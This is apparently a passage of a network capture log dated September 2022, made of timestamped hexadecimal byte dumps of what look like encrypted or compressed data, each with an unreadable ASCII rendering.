0b 6f e5 a9 8a dc cb 95 f4 c7 95 e7 24 a8 2e 14 16 ea e0 66 7b 1f 4f a7 0a 8f a8 77 11 ce a8 47 01 8f 0b 65 92 e4 13 65 02 01 2e 37 a4 74 69 a5 e2 9b d3 7b f1 68 23 96 13 2f d3 16 a2 86 42 ff f7 2f
                                                          Data Ascii: [Zf*f^|f|'Ce2g`Uid!.e}.gfEh"bg(\B"m.ij?zbXxfne\&IG"gai>rZ71f$}|-H=dS#Rwo$.f{OwGee.7ti{h#/B/
                                                          2022-09-11 08:16:25 UTC383INData Raw: ce de 21 c9 a4 e1 ea 02 eb 64 a4 39 9d 6a d1 08 b0 be 72 39 fd ea 69 40 4b 29 9c 51 e4 11 5e 64 2e 2a 71 79 b4 56 cb 26 ab 1e c4 f6 e7 40 50 32 e8 bb 73 ed c5 8c e1 f8 9b ae 04 3b 97 a6 42 fd 73 12 5f ea 57 07 22 50 04 a7 63 91 56 aa 6d a6 9f 5e 3d bb 34 38 37 54 78 39 c8 f6 7a a4 24 8a 44 1d b5 8f cc 83 d2 54 d0 16 e6 4e 43 ac d4 40 b8 32 7c aa f4 b0 5d 16 a9 20 66 a4 c0 c9 30 bd 9a 85 b1 3c e6 7d 49 38 e2 38 f4 6a 29 1a 92 5f e2 1f 97 cc 30 5b a6 23 65 2c 82 9d 4f 62 a7 bd 04 ac 85 b4 14 2f 90 1b 25 10 96 a4 d4 0b 07 dc 4c 8a ef 22 6e b2 29 bd 66 eb 93 5e c9 75 d4 e2 e7 e4 ee 1f 18 bb 6b bd 64 b2 32 97 28 c1 5d 93 f0 f5 80 12 9f 4d b7 f2 c4 99 ed 8e af 35 06 f0 fc 31 8b 46 b5 12 c2 6f d3 4e 00 4d 60 ac 7e b1 09 55 e6 60 5e dd 31 be 22 e2 8d 0b e4 6b e3
                                                          Data Ascii: !d9jr9i@K)Q^d.*qyV&@P2s;Bs_W"PcVm^=487Tx9z$DTNC@2|] f0<}I88j)_0[#e,Ob/%L"n)f^ukd2(]M51FoNM`~U`^1"k
                                                          2022-09-11 08:16:25 UTC399INData Raw: 86 65 ed 1c 54 3a 37 70 bd 22 6b 63 6a ca 72 b5 4c 1e 20 38 04 a9 d7 d3 ae 6a 1d ce d9 2d 63 ba fd ed 4a cd 09 80 44 7a 40 9d 26 89 8a 62 6a 62 64 0d 0b 62 9a 37 c5 60 6a af 2e 02 85 6c 6a 62 67 a6 e9 ab ed 02 d2 27 e8 74 8d c9 20 29 2e eb 4b eb 3c d8 8c bd 92 fa b7 59 1e 60 ba 76 7a 73 d8 99 57 5d 27 34 f6 e1 8d 23 0f c2 93 12 c3 3a ca 56 a7 a6 7b 7b d9 96 8d ce 88 95 19 4d eb 63 b8 71 e2 2b c6 4b a3 f1 7c 21 1f c9 2c 93 c1 2b dd 93 17 0c c6 0a bd f5 81 58 28 c5 03 63 ef 13 7c 89 c7 7d d3 2d 68 2b 4d 4c 24 e8 af a5 d0 d9 14 90 61 32 74 6d c0 0c 80 0b e1 21 9f 0d f4 4e c4 54 1b fc 84 1a e1 1b e8 f3 14 34 89 c8 06 4f e1 a0 2a a7 6d 27 2e fe 3a b4 9a f8 a7 6a 59 41 9d 1b f8 4c 33 a4 6c 40 13 5c 20 ec d8 f6 63 6e ab 25 ef 29 ef 67 ab 4c 05 ac b4 6c b3 21 f8
                                                          Data Ascii: eT:7p"kcjrL 8j-cJDz@&bjbdb7`j.ljbg't ).K<Y`vzsW]'4#:V{{Mcq+K|!,+X(c|}-h+ML$a2tm!NT4O*m'.:jYAL3l@\ cn%)gLl!
                                                          2022-09-11 08:16:25 UTC399INData Raw: 6b 2e 2b e1 a0 e4 67 43 c2 cc 16 23 3f a4 57 5d 8f ff 12 75 47 45 a8 7d 9f 6e 93 60 bd 72 47 95 b8 b0 7e 55 78 96 e0 19 7b b2 85 c1 0e 61 d5 d6 3f 90 00 28 6f a4 18 29 1f 3d f2 bc ab ba 77 ba a8 6a 1d d7 54 4e 78 d3 16 59 d0 d5 e2 d4 a4 0d cb 04 ef cd 8f cd 76 a7 f6 ab 27 c6 d7 ba a6 65 98 6d 63 dd 10 89 87 6d 91 e8 dd 9e 6e d0 86 65 d8 c1 a0 4f 41 08 44 ba 0a d9 1f 42 29 a4 71 bc 71 bf 72 90 82 b5 be 61 b3 d2 84 2c 70 e2 6b 28 2b 07 c6 cb 9e 62 be b0 26 72 6d 03 cd cc a3 22 4d cc c5 a3 6c 7c ca 9c 24 06 0e 74 a5 78 cc a5 00 e1 e8 a3 74 73 c4 4f b7 2a 67 c6 e8 89 0e e2 30 6d df 6d 11 86 b2 78 b7 44 db 48 e2 42 a8 dd 6a 12 ed a9 ed ea 65 49 ce 5c 15 44 1c b2 88 fc ef a1 8d ff dd d4 5e 13 5c 14 ec 20 e2 ab 55 90 eb 10 57 f0 f3 ab 24 28 65 24 6f 34 73 ed 41
                                                          Data Ascii: k.+gC#?W]uGE}n`rG~Ux{a?(o)=wjTNxYv'emcmneOADB)qqra,pk(+b&rm"Ml|$txtsO*g0mmxDHBjeI\D^\ UW$(e$o4sA
                                                          2022-09-11 08:16:25 UTC403INData Raw: 7a ec a5 75 b5 e4 c3 8c 59 92 af 25 af 97 65 a2 14 49 0a ad 64 0b c2 97 df e9 21 6b 58 8d a2 ce 00 3f f2 30 64 31 7b 8e a8 ed c3 ce 96 f4 23 ec 73 f8 7c fb d6 16 7d bc a6 80 45 d3 2c 19 c3 cd f2 64 3c 60 da e5 b4 4e a8 2e 78 85 4d 28 86 9d 67 ed 29 a9 4d 8d 66 ae e0 8e d8 c7 26 79 a3 bf 36 b4 a6 6a b0 1e 7b 4f 4b e6 80 c6 89 ce 20 11 a0 27 6d 09 f4 32 3a f2 1c 90 03 21 d4 4a 34 98 9d df a6 85 df b6 eb 81 af 2d 70 28 a4 40 34 ec f0 01 95 89 52 73 43 20 a9 f6 93 ed 29 2e 1e 9a 58 b0 80 4b f0 01 38 ba 7a f2 6b 73 63 2b f2 c7 5a 19 54 e2 62 eb 30 f1 97 90 6d d0 bd c5 a8 6a 4f 0a 2c 69 a7 6a 22 2f 13 0f 49 90 a2 88 11 3d a4 95 9b 2a df 91 a6 19 06 09 16 80 4b 85 4f 60 ad 6a a7 58 55 e2 6c e9 63 8e dc f2 a8 6a 2b 79 74 a2 6c 05 6b c1 31 cb 1b 20 ad c1 51 3f 62
                                                          Data Ascii: zuY%eId!kX?0d1{#s|}E,d<`N.xM(g)Mf&y6j{OK 'm2:!J4-p(@4RsC ).XK8zksc+ZTb0mjO,ij"/I=*KO`jXUlcj+ytlk1 Q?b
                                                          2022-09-11 08:16:25 UTC405INData Raw: 87 f2 53 1f a7 c1 98 1d 44 0f 23 8b 42 a5 e3 e9 b2 f3 79 ff f9 1f 23 2e 6b 8e 0f 1c 71 4a 8f a9 40 22 cb a3 7c 10 1f 8e da 4b 1f 71 e0 9e d6 75 b1 dd 58 8a 0f a9 31 66 bb 64 a4 6a 2c 2a 24 11 89 9f 01 27 b6 78 a6 a3 bc 72 8c 83 db af 5f 12 1c a5 c7 2e a3 07 ee 18 b5 02 e6 61 af 88 1d 58 e5 84 a7 ee 6c c7 65 46 15 d8 2a e7 05 c1 2e 1b a5 8b 65 49 5d 4b 70 15 53 96 6c 2d d5 e4 1f ac 13 9b bb 97 46 e5 2d 6e 40 86 a6 4a 36 c4 f0 2b 4e 3e 27 57 23 ce 68 83 e2 b5 f7 8e cf 93 7f 34 99 6a 1d c7 b4 6e 67 eb 6b f7 ff 23 4e f5 70 4d df 80 8f 4d cf b9 9c 38 ad aa 85 44 81 0a 10 a5 b2 c5 43 05 26 be 13 84 81 aa 4f 45 26 c4 a7 03 86 0a 72 97 e4 2a a4 eb e7 68 fa d2 81 6a 2e ab c7 83 8f 93 36 6b c6 74 27 15 a7 e1 ed aa a0 6f 45 d1 99 f8 88 5b b0 38 0a 6a bf fb 76 1a 6f
                                                          Data Ascii: SD#By#.kqJ@"|KquX1fdj,*$'xr_.aXleF*.eI]KpSl-F-n@J6+N>'W#h4jngk#NpMM8DC&OE&r*hj.6kt'oE[8jvo
                                                          2022-09-11 08:16:25 UTC411INData Raw: 0a 2e 65 ba cc 13 65 e1 cc 41 ae a8 5f 51 a6 a8 2c 89 05 74 b9 75 b8 76 bb 2b fb 69 3b e1 6c 05 73 1a ef e1 fd fe d1 99 2f af 66 26 83 6e 6f de 46 d7 a7 59 94 a3 26 a9 fc fb 57 da e2 6e 6a a6 ec 88 00 d4 97 81 49 ae 9f 91 a8 6a 23 ab 23 2a ea 5b 95 69 64 e1 66 bf df 4a ab 35 d0 4d 80 02 64 18 b6 c0 cb 84 6c 29 64 39 37 a2 a4 f0 be 22 64 29 90 80 1b 98 fd 2b e7 22 64 2e 97 46 54 48 a2 4f 3d 32 25 08 4c 83 65 a1 27 bd fb 4e b3 12 6c 2d 43 15 3b ad e3 79 95 0c 93 90 86 41 f3 fd a7 6a 37 b2 64 fc 4d 73 49 68 a5 e1 e7 22 c5 b4 d0 22 94 44 51 b1 94 69 ef f1 3e eb cc c9 5d 33 04 21 64 c1 93 ba 63 4a dc f2 dc b1 b7 74 2a 8a 9c 99 1b 1d 97 99 a4 22 30 be 86 22 0c 80 56 9b 57 32 66 8f 4b ce 93 32 66 97 f7 56 9b 5c 77 5a 35 18 9f d1 36 6a e6 31 7f ba f5 5f d5 5e 54
                                                          Data Ascii: .eeA_Q,tuv+i;ls/f&noFY&WnjIj##*[idfJ5Mdl)d97"d)+"d.FTHO=2%Le'Nl-C;yAj7dMsIh""DQi>]3!dcJt*"0"VW2fK2fV\wZ56j1_^T
                                                          2022-09-11 08:16:25 UTC416INData Raw: 42 10 5e 50 ee 13 a2 d2 c1 90 5c 9e 6a 09 ad ed 18 c2 b4 d1 10 e6 7e 5b 8d 28 c4 8a 69 e6 6f 13 94 29 29 e7 f7 30 cb 37 56 d2 07 00 15 90 12 2a ff 70 e5 d3 a3 b4 c8 22 e6 e9 1f 99 60 e7 62 6a e5 c9 a9 4f 68 5e 13 a7 9b 9e 64 fc f0 ab a1 77 7e a8 ac e7 5f ef a7 6a 8d 7a 67 68 68 a7 c0 c0 6a 80 88 e2 2c 89 0f ed 2a a2 2d af 1a b4 cd 22 ff dc d8 f7 e9 5c df 2e 16 1f 6a 77 77 a7 28 45 ca a7 a2 aa 62 d7 4f 34 ed 3c 27 73 64 24 47 72 9c 8b f1 6f 15 b2 f0 f2 b7 ac e5 ec 53 2c b6 cc 66 d0 88 3b 63 d6 5f 3a f5 38 c5 55 af 2a f0 90 4e 2e 42 9d f3 2c 95 18 e7 fd 64 7b e2 e2 68 0e 40 a4 8b 8a 60 1d 9c 39 55 fe da 6f 18 ca bf 36 33 a8 a0 e7 4a 45 e4 ea ee 5f db e9 5d 6f 2d 36 03 a6 59 b3 c1 e9 dc 8b c8 12 24 a6 79 10 40 6a a0 2f e1 87 5e 38 e4 e9 4b 07 a2 6e d0 1e 27
                                                          Data Ascii: B^P\j~[(io))07V*p"`bjOh^dw~_jzghhj,*-"\.jww(EbO4<'sd$GroS,f;c_:8U*N.B,d{h@`9Uo63JE_]o-6Y$y@j/^8Kn'
                                                          2022-09-11 08:16:26 UTC423INData Raw: 2c ed 25 eb 05 d5 f6 b6 22 f8 f2 a5 4a 86 7f bb fb 2c 07 0f c2 d8 7f 0f 1a a1 21 27 b5 e1 e3 5a 09 a1 2f b9 4d d1 25 67 95 df 2d 9e d4 30 65 ff 38 82 06 a1 eb 45 c4 f0 b6 ab 7e 83 5d 6a 00 36 5c fd 2b 5a ca ad eb e4 ae eb 86 88 e1 a5 d3 96 85 06 7b 1b 07 6a 5f 1e aa 8d 0c 6a 28 6a 8d 79 5c dd 10 b8 20 3e 6b 8f 36 13 22 10 a7 7e 56 3c 60 21 67 59 46 50 b2 06 c9 6a b0 02 3b bc 92 6a 9f ad 85 a8 43 4e 6f 67 de 09 a7 61 73 cf f9 f9 e0 e1 d4 3d 1c f2 df 01 38 77 6e c0 de f3 39 6c 2f eb 33 f1 7b ca f9 d8 37 74 f8 09 5c 55 4f bb 16 4a dd ae 7d 1f dd b0 a7 3d 48 af 18 77 cd a4 6c fc 7e f7 f5 e6 66 a5 f2 f9 61 e8 b3 a2 f3 2d ec e4 69 6c ec 2b a0 21 33 1b 3a 36 82 a4 eb ac 77 87 d3 66 ec 20 25 ec e9 07 80 5f d3 2a c7 0a 63 fb a4 6d 90 49 97 48 3f 23 ee d5 12 6e d4
                                                          Data Ascii: ,%"J,!'Z/M%g-0e8E~]j6\+Z{j_j(jy\ >k6"~V<`!gYFPj;jCNogas=8wn9l/3{7t\UOJ}=Hwl~fa-il+!3:6wf %_*cmIH?#n
                                                          2022-09-11 08:16:26 UTC431INData Raw: 96 91 6b c6 c6 67 49 95 81 81 93 ec 85 a9 38 35 e4 a9 63 2c f0 f5 39 74 ed ae d9 90 ef a9 50 32 cb 2d 3d 3f 3e 22 bf 22 b8 47 97 1d 9a 13 15 b8 87 5a 24 89 df 72 ef af 62 3a 17 8b 65 38 4e 53 e2 f6 64 f2 bc eb f2 3d fd c2 09 08 cb 93 fe b7 73 92 4b da eb 6a f7 71 e0 e5 dc 92 b1 08 80 ba dc b0 f0 23 9b 81 00 6e 8c 45 cf 1e bf 26 28 a5 d3 4d b1 60 e4 0b 86 f6 d8 a9 3e dd c1 ba 05 90 82 47 45 69 f7 39 a2 ab 67 6c 95 98 8c 81 b6 33 8c 4d c7 1e 72 2f 67 14 df 24 ee 68 ec 0b 89 39 43 db d7 10 ec fb 64 30 9f 13 9e 58 fa 75 d8 31 e7 6e 87 2f d1 59 6e e6 d1 99 54 8b 46 90 8e 62 8c c7 36 6a 69 15 98 00 ef 01 87 f1 65 43 bf 39 74 96 ea 43 87 22 2c b9 07 da 6a 34 09 0b 33 02 37 89 c3 6a 9f ad e6 09 89 8e 0e 3b b4 d9 11 51 df ab e3 aa d3 1a eb dd 19 5b 9f a1 04 8b 46
                                                          Data Ascii: kgI85c,9tP2-=?>""GZ$rb:e8NSd=sKjq#nE&(M`>GEi9gl3Mr/g$h9Cd0Xu1n/YnTFb6jieC9tC",j437j;Q[F
                                                          2022-09-11 08:16:26 UTC434INData Raw: c0 51 0c a2 d4 9b 8e c2 e2 a8 14 fd 01 2a e2 37 74 4c 04 61 e2 ef 32 de a7 cf fb 7a 4f 6b 66 42 64 95 f7 4c cd e2 3e 23 d6 74 b9 75 a6 1e 6e f6 b9 45 e0 a3 28 34 f6 65 c9 02 fb fd 65 2a 67 72 1e 6f e2 02 64 e1 df ea 17 a7 dd e1 e0 11 ef e1 5b 15 e7 a7 d4 e8 f9 00 a3 a5 6d 17 11 b1 96 58 fc 63 4f 0a da 60 a7 11 e3 e2 ef e3 5d 51 e0 d2 17 19 d8 61 76 53 c6 a0 b4 fc 22 7d fb 63 4d 9a bc 6b 4d 93 fd af 2a 67 64 94 96 6b 60 ee b4 c9 34 1e 73 c6 80 69 6f e9 64 38 f5 18 b5 94 22 11 17 7e 10 15 09 57 b9 24 f8 9b 47 8b 5a b7 ac a0 de d7 e2 d3 c8 1c 56 fb 8b 07 c2 91 8e 44 64 b1 67 e9 c4 73 dd 29 6a ee 6f 8b 3f b9 5e 0d c2 9b 44 2f 40 fd 9b 01 af a3 44 28 67 af ea af 53 4b fb 6b ff 77 a3 66 64 2e 20 41 c4 ba 9f c3 12 61 a7 d4 5e d4 a1 2a 9d d0 5f 73 ce a1 9b dd ae
                                                          Data Ascii: Q*7tLa2zOkfBdL>#tunE(4ee*grod[mXcO`]QavS"}cMkM*gdk`4siod8"~W$GZVDdgs)jo?^D/@D(gSKkwfd. Aa^*_s
                                                          2022-09-11 08:16:26 UTC438INData Raw: 98 e0 73 70 71 c6 86 a1 13 0e 9b 92 03 07 96 0d da 50 bf 52 26 4c 84 e8 8f 17 f1 af 24 6b 84 52 b5 af 17 50 f8 c2 54 50 da 13 ba 0a e6 1f f8 f8 1f e0 c4 84 d1 fa 5a 47 37 1d 38 af 27 6e bf 1b c6 83 b7 a8 ec 1f a6 92 c0 2c 79 68 a4 6b 14 e6 2a d1 8c fc 1a 11 98 0d 02 f2 5f 77 56 2e 72 57 87 eb ab f1 74 af 26 ac d7 70 08 55 97 6a 4f 7e 5b 02 8f 67 fb 84 50 67 74 20 4b ad d3 2a df 9c 0a b8 06 09 16 80 3d 4d d5 3e d1 4e b7 cc 83 92 8c c8 26 29 24 a2 f7 ff 2f c9 61 0e 03 ca 6f ea 10 89 9e 7c 64 c6 ca 14 1a 12 a6 fc 2e d7 9e 7e 48 9c 9a 48 26 c9 85 97 93 e2 a4 28 24 ed 69 5d 4d 6c c4 18 5a 11 2e 12 32 8b 23 34 09 c0 4a 01 eb df 8b 2a 5c 58 f0 0f 95 b8 cd d7 a1 6c 97 5f 1f c8 f9 7f b2 7e b3 2f f5 7d b4 29 f2 a5 dd d7 66 e7 9a c9 3f 90 a4 d8 61 00 46 23 65 09 03
                                                          Data Ascii: spqPR&L$kRPTPZG78'n,yhk*_wV.rWt&pUjO~[gPgt K*=M>N&)$/ao|d.~HH&($i]MlZ.2#4J*\Xl_~/})f?aF#e
                                                          2022-09-11 08:16:26 UTC441INData Raw: 67 e4 83 4b f2 81 81 fd e8 5b e7 3b b8 ee 2a f0 49 8b e4 80 fd 4b b9 74 b8 34 e6 76 bb 77 a4 6b a4 f4 0c 47 d1 90 3f 0a b6 d8 2d 02 d1 c8 cb 9e 64 6a 38 7b 1a ee 8e 1e 0e 4d 6e 6c 01 b8 04 05 0b 4d 08 62 6f 93 10 64 3f ac d1 ae 88 03 09 b6 94 36 d8 2d e0 d6 a2 53 d2 e8 72 78 97 23 c5 81 2f 21 5e d8 d4 71 7f e4 f3 c5 68 e8 35 64 df 6e d7 72 64 8d ef ae 49 10 f7 0b 32 29 48 c6 e4 7a e0 9e e5 10 f3 36 64 e4 67 97 d6 27 e8 9e 45 ee ae 80 d4 67 20 51 01 91 3e 0b 32 a6 60 2c 27 ac e8 e7 ef fa 2e ba 87 ab 1e 6a 27 5b cb 6b c0 21 32 d7 62 eb 80 11 f6 7b 97 07 fa f1 eb 45 5f f9 25 21 a5 a9 e4 6c 81 86 33 d9 0f 19 bf bd 50 dd c0 b1 84 04 c4 8f d0 13 e1 a9 2e 2e f1 6f aa 3a 6c af e9 6a bb 4d 6b 95 a9 0b a8 0b 2d 26 89 81 cd 32 ca 7f 6c 8d e7 6e 87 d9 04 6a 72 a0 0f
                                                          Data Ascii: gK[;*IKt4vwkG?-dj8{MnlMbod?6-Srx#/!^qh5dnrdI2)Hz6dg'Eg Q>2`,'.j'[k!2b{E_%!l3P..o:ljMk-&2lnjr
                                                          2022-09-11 08:16:26 UTC442INData Raw: 07 f6 e8 bd 61 0c cf af 73 33 d5 10 5e 26 1b 6b 9c 19 64 2a 28 2e 2c 24 51 8b 9d 4d 42 bf 58 95 6b 99 2f af 54 18 e3 02 0e a5 e5 d7 18 ee 54 9d 01 4b 26 b9 fb d2 d0 cc 32 32 44 32 3a da d6 62 e3 ed 0b bf d3 a0 e3 71 30 e1 ec dd d8 db 7b 07 26 1e 20 d0 62 69 30 f3 04 4b 1f 51 96 50 29 57 16 e3 ee 42 38 54 2e a1 ce 01 2a e5 a1 83 b0 91 a2 ef 2f a2 e7 23 ee e2 ae ac e0 2f 9e 16 83 56 ea 77 62 4b 2f ce a5 11 de 41 8d 07 cb ed a0 6a 3a ff aa 4c c6 28 97 69 50 e6 66 e7 26 9f 57 d5 d0 a9 d5 db 62 e7 f3 1a d3 b1 65 27 5c 80 92 0a 41 cc a7 d1 dd b3 3a 2f 7f 7d 2c d8 91 76 7a 81 c1 02 f3 0a 3f e3 59 55 27 36 80 92 16 38 72 15 69 0a d5 3d aa 30 37 ac e3 0a f3 3a 6c a3 c1 21 a8 dc 53 29 a9 d3 d9 49 41 67 9c 9a 1f 17 22 20 a0 e8 e3 66 db 3a 78 54 27 10 54 a2 d1 f2 01
                                                          Data Ascii: as3^&kd*(.,$QMBXk/TTK&22D2:bq0{& bi0KQP)WB8T.*/#/VwbK/Aj:L(iPf&Wbe'\A:/},vz?YU'68ri=07:l!S)IAg" f:xT'T
                                                          2022-09-11 08:16:26 UTC446INData Raw: 41 65 ce d7 e1 b5 8d 06 fa 90 10 56 cd 02 6a 19 25 0c 34 c6 87 2b ef e5 eb 2c 68 ea 81 52 60 82 d8 15 b0 6d 07 da a7 2e fd 92 3e 63 36 f2 5b 32 db 32 84 53 ff 68 c1 56 f1 ab 76 12 03 fc ea 31 b7 33 65 92 f4 03 65 02 50 21 3b 88 8f 68 8c 43 a1 e1 aa ea 2e e1 24 e4 c1 6b b2 4b 35 ae a5 ea 11 b6 01 a4 40 2a fb 12 2e 22 74 00 97 62 f9 4c d3 ab c9 99 75 e0 0f 88 95 5a e6 92 9f ef c3 20 a1 75 46 98 b3 9e 53 2a 12 9f 5a 36 76 2e a7 aa 5c 48 3d 95 9b 2d af 61 26 85 cc 3f 76 34 08 1c 2c c3 84 5a
                                                          Data Ascii: AeVj%4+,hR`m.>c6[22ShVv13eeP!;hC.$kK5@*."tbLuZ uFS*Z6v.\H=-a&?v4,Z
                                                          2022-09-11 08:16:26 UTC447INData Raw: 4f 58 26 a2 06 94 4d 7d 83 cc 45 8b dc e8 d2 e0 6f 8c 8e eb 8a 5d b8 4d 9f 56 a3 52 9c 08 f5 f9 e6 8e 6e a6 79 6a b1 af 0a ee aa e1 c8 be 1e e4 88 4a 4f ef 8b 6a d4 db e0 96 5c e1 0b fc c0 17 27 70 1b c2 33 a3 3c 4c 61 d8 3e 51 74 e2 6d 33 1f 9c d9 42 df e7 33 0b 87 c1 29 5a e8 12 a5 59 98 bd c3 f4 34 f8 c4 2e 18 d2 a5 68 a7 6a 4c 84 99 96 6f 29 ab ed 28 41 0c 18 15 c3 16 7f a0 78 37 ee 4b 7d 93 5e a7 a6 34 03 26 ab 2b 65 0c ca f7 9b 06 fb 7f 1b 83 89 b9 f7 af 30 4b ad 27 d3 73 02 59 9e e3 4d 9a 9a 87 3d 15 8a a5 80 68 6e 81 bb 13 0b d3 1d a0 6e b5 0c 9e ad df d1 62 ef 9a 4c 81 1f 62 62 07 b3 67 5f 67 ab ea 17 d2 1c 54 10 bd d8 ba 85 85 df 0a 50 3f 99 29 cb 42 cb 42 27 62 f2 e7 4a 12 a9 2f e3 6e 80 1a 37 87 8d e8 aa 02 c6 21 24 64 22 2c e3 9e 52 67 68 a1
                                                          Data Ascii: OX&M}Eo]MVRnyjJOj\'p3<La>Qtm3B3)ZY4.hjLo)(Ax7K}^4&+e0K'sYM=hnnbLbbg_gTP?)BB'bJ/n7!$d",Rgh
                                                          2022-09-11 08:16:26 UTC452INData Raw: b3 6b 65 09 03 af 4a 0e 83 1e bf a9 d6 de 64 c3 83 6b ea ad d5 f5 a7 03 b7 77 21 ee bd 70 a7 23 65 3e 31 23 2c 15 1f 1d 7b fa f5 40 ac 71 fc af 21 a3 96 80 2d 8b d8 6b c1 87 ff f1 64 2f 28 d4 58 bc f4 2f 2f 2d e7 fb 31 22 a4 9c 1a 19 6b eb 31 c6 e3 e9 e9 e7 6f bd cb 8e 0c 35 8c 22 6a 02 3e 38 c9 09 53 a5 b8 7a f8 2a 61 bf bb d3 19 62 a8 d3 05 7d 2c ee a8 e1 2f 7a ff af 6a 2b ef a0 cc 82 a6 1e 38 c8 c4 bc 13 18 bc b5 2f 8f 79 ad ae c9 f2 3a 8a 63 c4 55 df 0e 82 63 ef 16 b7 3a 3c 2d 43 cb 42 4d d1 1f b2 7e e6 3e b2 7d b9 a3 ca c6 e3 6f 67 8b 82 fb 22 79 a5 22 dc 99 a3 e6 66 67 07 4e e7 2e 23 de 92 2a d5 d2 cd c3 6a 26 1b 05 bd 22 6a 3d 01 0b 5a 3f 2b 7b 78 6a 9f ad b1 fc 14 b1 c9 ec a3 91 a7 7c 9e b8 a5 6a a5 25 aa b2 d9 c1 6f 26 1a ff c6 a2 6c 13 5f 67 2a
                                                          Data Ascii: keJdkw!p#e>1#,{@q!-kd/(X//-1"k1o5"j>8Sz*ab},/zj+8/y:cUc:<-CBM~>}og"y"fgN.#*j&"j=Z?+{xj|j%o&l_g*
                                                          2022-09-11 08:16:26 UTC458INData Raw: a6 aa 90 13 62 b9 43 d1 c4 51 70 15 47 19 9c d7 4b e6 21 31 f1 7f b4 40 85 28 ed 17 5d be 7e df 2c d7 1a 87 f6 6b a7 19 a7 0f b5 e5 a9 ee 26 ae 6a 67 a6 bb f6 6f 27 15 5a 00 24 ba d9 1c 5d a3 e3 a7 83 e7 84 69 a7 26 d3 df af cb 83 72 bf 5e 92 f7 81 1c 7a 7b 37 b2 62 6a 2b c7 e3 97 c8 10 58 6a b3 91 32 2f 12 1b a3 95 97 4e 44 66 93 12 62 e7 f9 35 2e e4 e9 a9 68 0a 83 1a 5c ad cf 02 62 9b db 6e 22 10 20 18 2c 12 a1 6a 58 95 27 62 d2 6b 6b ed 64 e1 22 af e0 6d a7 22 10 5d 6f e1 d5 db d4 96 28 2d ea 28 5f da ec 97 11 19 43 ba a8 ee cb 82 a7 6a e6 95 10 62 a6 6f 21 27 96 d1 68 b4 72 aa a2 aa f0 b7 2c 3c 75 65 ed 2f 2c 24 27 a4 e1 e6 6d 30 76 2b 19 54 ed a5 76 7b 6b 22 ce cb 6f a0 f7 cb dd a0 2c aa 2f 21 6c ee 60 20 ef e3 eb b3 b6 a7 2f 43 6f 0f e2 51 56 d5 0b
                                                          Data Ascii: bCQpGK!1@(]~,k&jgo'Z$]i&r^z{7bj+Xj2/NDfb5.h\bn" ,jX'bkkd"m"]o(-(_Cjbo!'hr,<ue/,$'m0v+Tv{k"o,/!l` /CoQV
                                                          2022-09-11 08:16:26 UTC462INData Raw: 5c 38 b6 ea 6f ab bf bb fd 82 5a 75 f7 2b 4d c7 21 ab 8e 47 23 3d b1 3f 0e 56 bc c8 2d d8 e6 a2 e7 e3 8e b6 b9 88 2c 12 9c b9 94 c2 10 5d 27 d5 80 a2 f7 01 46 e0 e2 a7 74 0c df 2f ef 51 5e dc db 90 5a 3d fa 61 ea 69 e8 65 c7 4a b8 6d 99 03 d7 95 53 3a a3 c9 19 dc 00 06 4a cf a0 e0 cb c3 e6 0d ce 4d 57 b3 66 aa 47 ec ce 16 07 8d f5 0c ef 2d d6 d4 01 03 53 8c bc 33 38 a6 eb 2f 4a e4 ce 31 de 65 a6 8b 67 47 a5 5c 7c ab a9 e1 21 ed e1 a5 7b 49 5b 83 b2 ff c1 65 ff d0 2c 03 87 80 6d 21 65 c3 ca 2d 79 a4 f5 ed 6f 90 65 55 f4 13 4d 65 66 2b e1 59 c5 0c 96 e8 2a e1 fb f2 81 4c f5 5d 2b c2 e6 29 e8 ad e4 ea cc 4c 8d 64 46 ad ec 05 89 5f 1f eb ef f2 e6 1b 0f 20 65 eb f9 1a 01 82 81 48 a6 0a c3 4d 23 37 9b 95 97 20 f1 55 43 94 21 79 23 8e 47 67 21 e0 46 8a eb ab 27
                                                          Data Ascii: \8oZu+M!G#=?V-,]'Ft/Q^Z=aieJmS:JMWfG-S38/J1egG\|!{I[e,m!e-yoeUMef+Y*L]+)LdF_ eHM#7 UC!y#Gg!F'
                                                          2022-09-11 08:16:26 UTC463INData Raw: a5 73 bd 70 bf 72 82 0f 0f 92 ff a3 7a aa 17 1e c7 5a ff 83 19 35 bf 72 f8 4f d5 93 7c 30 26 d1 9d fb 91 a5 07 c0 e8 77 a2 94 57 99 61 40 a4 2b 20 ad a6 85 40 a9 95 6b e8 c7 c0 01 77 8f a2 b2 d5 2e 80 ae fb 16 3a e7 ba 6b 37 21 97 d6 b8 a9 29 28 e5 bf 7f db ce f1 ec e9 db 94 d3 0f be 23 63 56 5e ae 57 15 96 51 5e e6 cf 81 11 52 de 1f 53 fd 58 7b 90 5b a7 2c 2e 11 fd fb b6 23 97 6e 8b aa ef 19 5f 9d e7 df d6 de 43 3b 16 0b e5 f2 23 34 a4 2b 29 38 4d e6 ae fa d7 0d 7f 31 db 8a 1d d9 71 5d 49 82 5e e6 22 74 24 2e 20 9a 3d 8e 25 3f 8e 72 87 ef f9 c5 df d6 a6 c3 47 4b 5c 43 47 83 65 39 54 ad 30 ea 1c e3 06 4b ed 23 b0 30 60 3d 48 8b 3d 22 2e f2 ff a8 6f 21 e7 ab 6a 7e ff 13 d6 e3 7e 2a d6 0b 24 41 47 3a 40 76 44 76 d8 09 87 2b c6 2f a2 28 8d 33 d6 ed 70 2e 33
                                                          Data Ascii: sprzZ5rO|0&wWa@+ @kw.:k7!)(#cV^WQ^RSX{[,.#n_C;#4+)8M1q]I^"t$. =%?rGK\CGe9T0K#0`=H=".o!j~~*$AG:@vDv+/(3p.3
                                                          2022-09-11 08:16:26 UTC467INData Raw: 09 ee 90 4c f0 37 78 de d2 50 75 5a c6 e1 5c 52 23 27 e7 41 87 35 f3 e3 36 03 de a1 68 26 ab fd 16 78 92 7f fe 40 94 26 7b ae e7 a7 22 62 a1 ab 53 73 c8 a0 d5 da 65 f3 6d a0 b1 86 05 cc 48 52 e0 1e 1f de dd 10 2a b3 f7 ab 07 3b 06 ff 0b 9d 3b 65 2b 22 46 83 af 62 14 de a5 af 64 21 0f ec 99 7e 88 58 ee 72 eb ad 66 28 eb a5 75 27 63 f1 61 e3 b2 ca b6 f7 aa 30 fc fc 02 58 27 87 38 e2 8e 1d ba 2a ef ab ff c9 46 cc d3 23 19 55 27 6f d9 92 16 f0 0a 1f 1c f2 a4 3b 6b af 10 15 78 fc 2c a3 28 2a f3 ae 79 e3 ec 5d b3 74 3a ea 1c dd 82 98 d9 76 f6 4b 80 13 f9 09 ee e9 7b 1a 93 b8 5c d2 1f 53 c4 7a b9 e7 32 40 7b 90 8e 22 